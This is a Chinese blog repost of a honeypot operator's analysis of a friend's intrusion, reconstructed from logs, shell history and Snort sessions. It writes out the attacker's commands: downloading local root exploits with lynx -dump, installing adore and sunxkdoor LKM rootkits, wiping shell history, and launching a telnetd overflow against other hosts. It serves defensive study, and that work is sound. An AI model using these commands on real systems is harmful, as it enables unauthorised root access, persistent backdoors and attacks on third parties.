一次入侵秀的详细分析

    [晴 March 10, 2008 13:17 | by ]
来源:辛巴达安全
冷漠PS:刚在网上瞎转悠时看到的一篇文章,很老了,不过以前好像没有看过,看了下,发现比较有意思,虽然说是一场入侵秀,可是很多入侵的手法和思路都值得我们学习,也是一遍比较经典的linux下的入侵文章。(注:文章结尾附上 pdf 的文档,提供下载)

1、起因

本文聚焦于我的Linux Honeypot,她在网络中散发着阵阵蜜香,引诱蠕虫和各路客们的光临。为了让honeypot 更加attractive,都要采取一些处理方式。最近邮件列表中还有过这种讨论,有个家伙说他朋友在某黑客IRC 中公布了honeypot 的IP 地址,结果一帮罗马利亚黑客入侵后发现是一个蜜罐系统,所有动作都被完整记录,于是愤怒了,采用分布式拒绝服务方式疯狂报复,导致临近网络瘫痪一个月之久。 所以,在引诱入侵者的时候要讲究技巧。上个月我曾和一个朋友聊起我的方法: 建立一个普通用户账号,密码同用户名,在控制台上用该账号登录,让他一直发呆,同时确认系统开放着finger 服务。比较怀旧的入侵者对finger还是情有独钟的,企图finger出一大堆用户名,然后简单猜测密码进入系统,期望能够与后生可畏的Script Kids 们划清界限。没想到我的朋友记忆力特别好,事隔一个月,在我没发请柬的情况下,轻车熟路的找到honeypot,然后用那个普通账号登录了进去。 明明知道这是个蜜罐系统,所有行为都被监控和记录,还要企图本地拿root、安装后门、作为肉鸡攻击其他机器,不就是在舞台上表演请观众们欣赏么?这
就是入侵秀一词的由来。
下面就让我们一起来观摩这场表演,素材主要来源于日志服务器收集到的系统日志、历史命令,以及Snort 录下的会话过程。当然,为了节约篇幅和保护隐私作了部分裁减。希望读者从各自的角度都能有所收获。

2、扫描

一个周六的下午,Snort 报警提示有来自202.X.X.X 的SuperScan 扫描,发送了一个ICMP Echo 的数据包测试系统是否存活:
2004-9-21 16:48 snort[1852]: [1:474:1] ICMP superscan echo [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 202.X.X.X -> 10.0.0.1

同时,系统日志记录了后续进行的端口探测活动:
2004-9-21 16:48 in.rlogind[1316]: connect from 210.X.X.X
2004-9-21 16:48 inetd[413]: pid 1318: exit status 1
2004-9-21 16:48 in.rshd[1318]: connect from 210.X.X.X
2004-9-21 16:48 in.fingerd[1315]: connect from 210.X.X.X
2004-9-21 16:48 in.telnetd[1313]: connect from 210.X.X.X
2004-9-21 16:48 rshd[1318]: Connection from 210.X.X.X on illegal port
2004-9-21 16:48 telnetd[1313]: ttloop: peer died: EOF
2004-9-21 16:48 inetd[413]: pid 1316: exit status 1
2004-9-21 16:48 inetd[413]: pid 1313: exit status 1
2004-9-21 16:48 sendmail[1314]: NOQUEUE: Null connection from [210.X.X.X]
2004-9-21 16:48 in.fingerd[1319]: connect from 210.X.X.X
2004-9-21 16:48 in.telnetd[1320]: connect from 210.X.X.X

注意到没有,这些端口连接的源地址不是发送ICMP Echo 的202.X.X.X,而是210.X.X.X这个地址。很显然,我的朋友使用了TCP/UDP协议的代理跳板,而ICMP 协议不被该跳板支持,所以他的真实IP 地址也暴露了。:P

3、本地越权尝试

用我的诱饵账号tom轻松登入,一次成功,就像进自己家一样:
2004-9-21 16:52 login: LOGIN ON 1 BY tom FROM 210.X.X.X
2004-9-21 16:52 PAM_pwdb[1321]: (login) session opened for user tom by(uid=0)

用cat 重定向加粘贴方式传送一段本地越权脚本到系统内,请注意时间差,他的翻箱倒柜花了4 分钟:
2004-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 w
2004-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 pwd
2004-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 cd ..
2004-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 cd tom
2004-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 cat > 1.sh
2004-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 chmod 755 1.sh
2004-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 ./1.sh
2004-9-21 16:58 -bash: HISTORY: PID=1322 UID=500 ls
  
输入./1.sh 执行后的结果呢?我们通过检查Snort 的SESSION录像后发现,系统由于缺少相关库文件,没成功。注意:录像中命令输入的每个字符都出现了两遍,这是终端的回显功能,Snort是忠实的作了双向记录:
[tom@abc tom]$ ..//11..sshh
+-----------------------------------------------------------+
| Linux kernel 2.2.X (X<=15) & sendmail <= 8.10.1 |
| local root exploit |
| |
| Bugs found and exploit wr#tten by Wojciech Purczynski |
| wp@elzabsoft.pl cliph/ircnet Vooyec/dalnet |
+-----------------------------------------------------------+
Creating temporary directory
Creating anti-noexec library (capdrop.c)
Compiling anti-noexec library (capdrop.so)
Creating suid shell (sush.c)
Compiling suid shell (sush.c)
Creating shell script
Creating own sm.cf
Dropping CAP_SETUID and calling sendmail
/bin/true: error in loading shared libraries: /tmp/foo/capdrop.s cannot open shared object file:
No such file or directory
Waiting for suid shell (/tmp/sush)
[tom@abc tom]$ llss

第一次尝试失败,删除1.sh,同时留下“XXXX到此一游”的签名。也好,知道是你干的了J
2004-9-21 16:58 -bash: HISTORY: PID=1322 UID=500 rm -rf 1.sh
2004-9-21 16:58 -bash: HISTORY: PID=1322 UID=500 echo haha shi wo XXXX > haha.txt

我的朋友开始闲逛了,好像没什么收获:
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd /tmp
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd foo
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls
Sinbad Technical Publications Page 4
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd ..
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls -al
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd .font-unix
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd fs-1
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd fs-1
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls -al
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd /
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd home
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd ftp
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd /
2004-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:01 -bash: HISTORY: PID=1322 UID=500 ps -ef


4、第二次本地越权尝试

重新换了个本地越权程序,编译后又立即把它删除了?
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 cd ~tom
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 cat > su.c
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 gcc -o su su.c
2004-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:06 -bash: HISTORY: PID=1322 UID=500 rm -rf su.c

原来是编译的时候出错了。源代码中有些字符在用cat 重定向粘贴的时候出了问题:
[tom@abc tom]$ ggcccc - -oo ssuu susu..cc
su.c:101: unterminated character constant

换种方式,vi 一个新文件,往里面贴:
2004-9-21 17:06 -bash: HISTORY: PID=1322 UID=500 vi su.c
2004-9-21 17:07 -bash: HISTORY: PID=1322 UID=500 gcc -o su su.c

这次的效果更加不好,出现了三个错误。同时我们也注意到,记录下来的的输入命令部分有大量的 [A、[D 字符,这其实是在用上下键寻找刚才敲过的历史命令“gcc –o su su.c”,看来他是够懒的:P
[tom@abc tom]$ [Avi su.c[A[D[D[D[D[D[D[D[4@rm -rf su.c[A[D[D[D[D[D[D[D[D[D[D[Dls[K[A[D[Dgcc -o su su.c
su.c:107: unterminated character constant
su.c:523: unterminated string or character constant
su.c:130: possible real start of unterminated constant

又留下一句话“以后有空再搞”,走了。周末下午的5 点多,应该有活动吧:
2004-9-21 17:09 -bash: HISTORY: PID=1322 UID=500 ls
2004-9-21 17:10 -bash: HISTORY: PID=1322 UID=500 rm -rf *.c
2004-9-21 17:10 -bash: HISTORY: PID=1322 UID=500 echo kao,yihou you kong zai gao >> haha.txt
2004-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 w
2004-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 ls -al
2004-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 cat .bash_history
2004-9-21 17:13 -bash: HISTORY: PID=1322 UID=500 cat /etc/passwd
2004-9-21 17:16 -bash: HISTORY: PID=1322 UID=500 exit


5、第三次本地越权尝试

两天后,我的朋友又来了。是一个周一的下午,上班时间,看来他的工作不是很忙。这就是“搞机器”一族的共同特点:拥有大量的时间和精力。
2004-9-23 13:28 in.telnetd[5567]: connect from 210.X.X.X
2004-9-23 13:28 PAM_pwdb[5568]: (login) session opened for user tom by(uid=0)
2004-9-23 13:28 login: LOGIN ON 1 BY tom FROM 210.X.X.X

这次他吸取了教训,试图用wget 直接从网上下载,不过我的系统好像没有装wget,或者PATH 值不对,最后他改用lynx 加-dump 参数成功的从国内一个hack.co.za 的镜像站点下载了利用/bin/su 的越权程序su.c,编译后执行,终于获得了本地root权限:
2004-9-23 13:29 -bash: HISTORY: PID=5569 UID=500 w
2004-9-23 13:29 -bash: HISTORY: PID=5569 UID=500 ps -ef
2004-9-23 13:32 -bash:HISTORY: PID=5569 UID=500 wget _hack_co_za/redhat/5.1/su.c">http://www.safechina.net/www_hack_co_za/redhat/5.1/su.c
2004-9-23 13:34 -bash: HISTORY: PID=5569 UID=500 lynx
2004-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 lynx -dump _hack_co_za/redhat/5.1/su.c">http://www.safechina.net/www_hack_co_za/redhat/5.1/su.c > su.c
2004-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 gcc -o su su.c
2004-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 ./su
su exploit by XP <xp@xtreme-power.com>
Enjoy!
Phase 1. Checking paths and write permisions
Checking for /usr/bin/msgfmt...Ok
Checking for /usr/bin/objdump...Ok
Checking write permisions on /tmp...Ok
Checking read permisions on /bin/su...Ok
Checking for a valid language... [using af_ZA] Ok
Checking that /tmp/LC_MESSAGES does not exist...Ok
Phase 2. Calculating eat and pad values
......................................................................done
eat = 120 and pad = 2
Phase 3. Creating evil libc.mo and setting enviroment
vars
Phase 4. Getting address of .dtors section of /bin/su
..........................................done
.dtors is at 0x0804bd3c
Phase 5. Compiling suid shell
/tmp/xp created Ok
Phase 6. Executing /bin/su
- Entering rootshell ;-) -
sh-2.03# iid

Snort也报警提示他获得了root权限:
2004-9-23 13:37 snort[1852]: [1:498:3] ATTACK RESPONSES id check returned root [Classification:
Potentially Bad Traffic] [Priority: 2]: {TCP} 10.0.0.1:23 -> 210.x.x.x:4560


6、安装后门

成功取得最高权限后,我的朋友开始下载adore rootkit和一个叫做sunxkdoor的后门程序:
2004-9-23 13:39 sh: HISTORY: PID=7046 UID=0 lynx -dump http://stealth.7350.org/rootkits/adore-0.52.tgz > 1.tgz
2004-9-23 13:47 sh: HISTORY: PID=7046 UID=0 lynx -dump http://www.sunx.org/mysoft/sunxkdoor.tar > 1.tar

不过这次又失败了,重定向的文件都是0 字节。因为在越权获得的这个shell中,lynx并不能正常的工作:
sh-2.03# lynx -dump http://stealth.7350.org/rootkits/adore-0.52.tgz >> 1.tgz
Your terminal lacks the ability to clear the screen or position the cursor.
sh-2.03# llyynnxx --dduummpp http:h//www.sunx.org/mysoft/sunxkdoor.tarttp://www.sunx.org/mysoft/sunxkdoor.tar >> 11..ttarar
Your terminal lacks the ability to clear the screen or position the cursor.
sh-2.03# lls s-a l
-al
total 4
drwxr-xr-x 2 tom tom 1024 Sep 22 21:43 .
drwxrwxrwt 5 root root 1024 Sep 22 21:35 ..
-rw-rw-r-- 1 root root 0 Sep 22 21:43 1.tar
-rw-rw-r-- 1 root root 0 Sep 22 21:37 1.tgz
-rw-rw-r-- 1 root root 0 Sep 22 21:37 adore.tgz
-rwxrwxrwx 1 tom tom 458 Sep 22 21:35 libc.mo
-rw-rw-r-- 1 tom tom 428 Sep 22 21:35 libc.po
sh-2.03# rrm m --rrff **

多次失败之后,他退出了rootshell 返回到正常的终端下,成功的用lynx 分别下载了一个攻击telnet 守护进程的telnetd.c 保存为1.c、adore rootkit 保存为1.tgz、sunxkdoor 后门保存为2.tar:
sh-2.03# eexxiitt
exit
Sinbad Technical Publications Page 8
Phase 7. Cleaning enviroment
rm: cannot unlink `/tmp/xp': Operation not permitted
2004-9-23 14:03 -bash: HISTORY: PID=5569 UID=500 lynx -dump linux-secure.net/pliki/exploits/telnetd/telnetd.c">http://www.linux-secure.net/pliki/exploits/telnetd/telnetd.c> 1.c
2004-9-23 14:04 -bash: HISTORY: PID=5569 UID=500 lynx -dump http://stealth.7350.org/rootkits/adore-0.52.tgz> 1.tgz
2004-9-23 14:04 -bash: HISTORY: PID=5569 UID=500 ls -al
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 tar zxfv 1.tgz
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 cd adore
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 ls
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 ./configure
2004-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 make
2004-9-23 14:06 -bash: HISTORY: PID=5569 UID=500 ls
2004-9-23 14:07 -bash: HISTORY: PID=5569 UID=500 cd ..
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 lynx -dump http://www.sunx.org/mysoft/sunxkdoor.tar > 2.tar
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 ls -al
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 export HISTFILE=/dev/null

下面开始安装sunxkdoor 这个LKM 的后门,这需要root权限,他再次运行su的越权程序获得rootshell,然后用insmod加载sunxkdoor,便退出了系统利用这个后门绕开登录过程进来了。此后门应该是截获了原有/bin/login 的调用,先是telnet 到系统,在login:提示符后输入sunxkdoor 这个关键串,系统自动断开连接;接着再telnet,就直接获得root的#号提示符。 注意,他把下载的三个后门程序都移到tom主目录下新建的TOM目录中了。
2004-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 ./su
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 pwd
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 cd ~tom
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 tar xfv 2.tar
2004-9-23 14:10 sh: HISTORY: PID=8570 UID=0 export HISTFILE=/dev/null
2004-9-23 14:12 sh: HISTORY: PID=8570 UID=0 cd sunxkdoor
2004-9-23 14:12 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:13 sh: HISTORY: PID=8570 UID=0 gcc -O2 -c sunxknlsh_linux_II.c
2004-9-23 14:13 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 mv sunxknlsh_linux_II.o ../sun.o
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 cd ..
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 w
2004-9-23 14:14 sh: HISTORY: PID=8570 UID=0 rm -rf sunxkdoor
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls
Sinbad Technical Publications Page 9
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 mkdir TOM
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 mv * TOM
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 cd TOM
2004-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls
2004-9-23 14:16 sh: HISTORY: PID=8570 UID=0 insmod
2004-9-23 14:16 sh: HISTORY: PID=8570 UID=0 whereis insmod
2004-9-23 14:17 sh: HISTORY: PID=8570 UID=0 /sbin/insmod sun.o
2004-9-23 14:17 sh: HISTORY: PID=8570 UID=0 /sbin/lsmod
2004-9-23 14:17 sh: HISTORY: PID=8570 UID=0 exit
2004-9-23 14:17 -bash: HISTORY: PID=5569 UID=500 exit
2004-9-23 14:17 PAM_pwdb[5568]: (login) session closed for user tom
#'!
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
login: ssuunnxkxkddooroor
#'!
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
[root@abc /]# ccd d ~~ttomom
[root@abc tom]# llss

TOM
下面开始安装adore,编译的时候缺少一个头文件,我的朋友还是能够从Linux 源代码的目录中找到并拷贝到adore目录中,把adore 编译出来了。启动adore后,利用工具ava隐藏TOM 目录时,尽管提示hidden,但ls的时候还是能看到。我的朋友很郁闷,可能是adore 和sunxkdoor这两个LKM 之间有冲突。
2004-9-23 14:23 login: HISTORY: PID=8620 UID=0 cd TOM
2004-9-23 14:23 login: HISTORY: PID=8260 UID=0 tar zxfv 1.tgz
2004-9-23 14:23 login: HISTORY: PID=8260 UID=0 cd adore
2004-9-23 14:23 login: HISTORY: PID=8260 UID=0 ls
2004-9-23 14:23 login: HISTORY: PID=8260 UID=0 ./configure
2004-9-23 14:23 login: HISTORY: PID=8260 UID=0 make
2004-9-23 14:23 login: HISTORY: PID=8620 UID=0 find / -name spinlock.h
2004-9-23 14:24 login: HISTORY: PID=8620 UID=0 cp /usr/src/linux-2.2.14/include/asm-i386/spinlock.h .
2004-9-23 14:24 login: HISTORY: PID=8620 UID=0 make
2004-9-23 14:24 login: HISTORY: PID=8620 UID=0 ls
2004-9-23 14:25 login: HISTORY: PID=8620 UID=0 mv *.o ../
2004-9-23 14:25 login: HISTORY: PID=8620 UID=0 ls
Sinbad Technical Publications Page 10
2004-9-23 14:25 login: HISTORY: PID=8620 UID=0 mv ava ../
2004-9-23 14:26 login: HISTORY: PID=8620 UID=0 mv startadore ../
2004-9-23 14:26 login: HISTORY: PID=8620 UID=0 ls
2004-9-23 14:26 login: HISTORY: PID=8620 UID=0 cd ..
2004-9-23 14:26 login: HISTORY: PID=8620 UID=0 ls
2004-9-23 14:26 login: HISTORY: PID=8620 UID=0 rm -rf adore
2004-9-23 14:26 login: HISTORY: PID=8620 UID=0 vi startadore
2004-9-23 14:29 login: HISTORY: PID=8620 UID=0 ls
2004-9-23 14:29 login: HISTORY: PID=8620 UID=0 insmod
2004-9-23 14:29 login: HISTORY: PID=8620 UID=0 ./startadore
2004-9-23 14:30 login: HISTORY: PID=8620 UID=0 mv startadore start
2004-9-23 14:30 login: HISTORY: PID=8620 UID=0 ./ava
2004-9-23 14:30 login: HISTORY: PID=8620 UID=0 ./ava h ..TOM
2004-9-23 14:30 login: HISTORY: PID=8620 UID=0 ./ava h ../TOM
2004-9-23 14:30 login: HISTORY: PID=8620 UID=0 cd ..
2004-9-23 14:30 login: HISTORY: PID=8620 UID=0 ls


7、作为跳板攻击他人

用adore 没有成功的隐藏目录,我的朋友突然想起来自己曾经下载过一个telnetd 的远程溢出脚本,于是编译保存为1,就开始了试验,先是攻击本机,后来又改攻公网上的其他机器。理论上讲,honeypot应该限制往外发起的连接,比如同一时间内的连接数,以防止被人安装了分布式拒绝服务程序,用来攻击其他机器,引起不必要的麻烦。我的honeypot并没有做这方面的限制,因为我每天都花时间来观看她里面发生的故事,做到了如指掌J
2004-9-23 14:50 login: HISTORY: PID=8699 UID=0 ./1 -h 127.0.0.1
2004-9-23 14:50 in.telnetd[8774]: connect from 127.0.0.1
2004-9-23 14:50 telnetd[8774]: ttloop: peer died: EOF
2004-9-23 14:56 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.230 -t 5
2004-9-23 14:58 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.230
2004-9-23 14:59 inetd[8783]: 2222/tcp: bind: Address already in use
2004-9-23 14:59 inetd[8783]: extra conf for service 2222/tcp (skipped)
2004-9-23 15:10 inetd[8783]: 2222/tcp: bind: Address already in use
2004-9-23 15:10 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.96 -t 5
2004-9-23 15:10 inetd[8793]: 2222/tcp: bind: Address already in use
2004-9-23 15:10 inetd[8793]: extra conf for service 2222/tcp (skipped)
2004-9-23 15:11 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.106 -t 5
2004-9-23 15:11 inetd[8793]: extra conf for service 2222/tcp (skipped)
2004-9-23 15:12 inetd[8796]: extra conf for service 2222/tcp (skipped)
Sinbad Technical Publications Page 11
2004-9-23 15:12 inetd[8796]: 2222/tcp: bind: Address already in use
2004-9-23 15:14 last message repeated 2 times
2004-9-23 15:14 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.186 -t 3
2004-9-23 15:15 inetd[8799]: 2222/tcp: bind: Address already in use
2004-9-23 15:15 inetd[8799]: extra conf for service 2222/tcp (skipped)
2004-9-23 15:15 snort[1852]: [1:648:5] SHELLCODE x86 NOOP [Classification: Executable
code was detected] [Priority: 1]: {TCP} 211.xxx.xxx.186:23 -> 10.0.0.1:1053
2004-9-23 15:17 last message repeated 3 times
2004-9-23 15:17 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.25 -t 4
2004-9-23 15:17 inetd[8804]: extra conf for service 2222/tcp (skipped)
2004-9-23 15:17 inetd[8804]: 2222/tcp: bind: Address already in use
2004-9-23 15:18 last message repeated 4 times
2004-9-23 15:18 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.16 -t 5
2004-9-23 15:19 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.16 -t 5
2004-9-23 15:19 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.15 -t 5
2004-9-23 15:20 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.226 -t 4

在这里我没有太多关注这个溢出脚本的执行结果,只是注意到系统产生了大量的同一条日志,都发生在./1 命令执行之后:
2004-9-23 15:20 inetd[8810]: 2222/tcp: bind: Address already in use

经过检查,原来是在tcp/2222 端口打开了一个root 权限的shell!看来这个溢出程序的功能蛮多的,还给自己的机器绑定shell:P 接着,我登录MSN 联系到那位朋友,他说打算结束表演了,于是我开始kill 掉这该死的telnetd 溢出程序,修复伤痕累累的honeypot 让她重新上线。同时备份入侵日志文件,抓住他的把柄以备将来敲诈。:)

8、总结

本文介绍了引诱入侵者的一种方法,以及对一个朋友的不请自到所作操作的详细分析。包括借助跳板隐藏真实IP、三次尝试本地越权最后成功、安装了两个LKM 类的后门、以及作为跳板攻击他人机器。这是一个典型的入侵工作者的作业流程,我们通过分析这些行为的细节,可以学习认识到更多的后门程序、溢出脚本、故障排除方法,甚至个人习惯等一些有趣的东西。

Technology | Comments(1) | Trackbacks(0) | Reads(10192)
seraph Homepage
March 31, 2008 06:05
太有意思了,
Pages: 1/1 First page 1 Final page
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive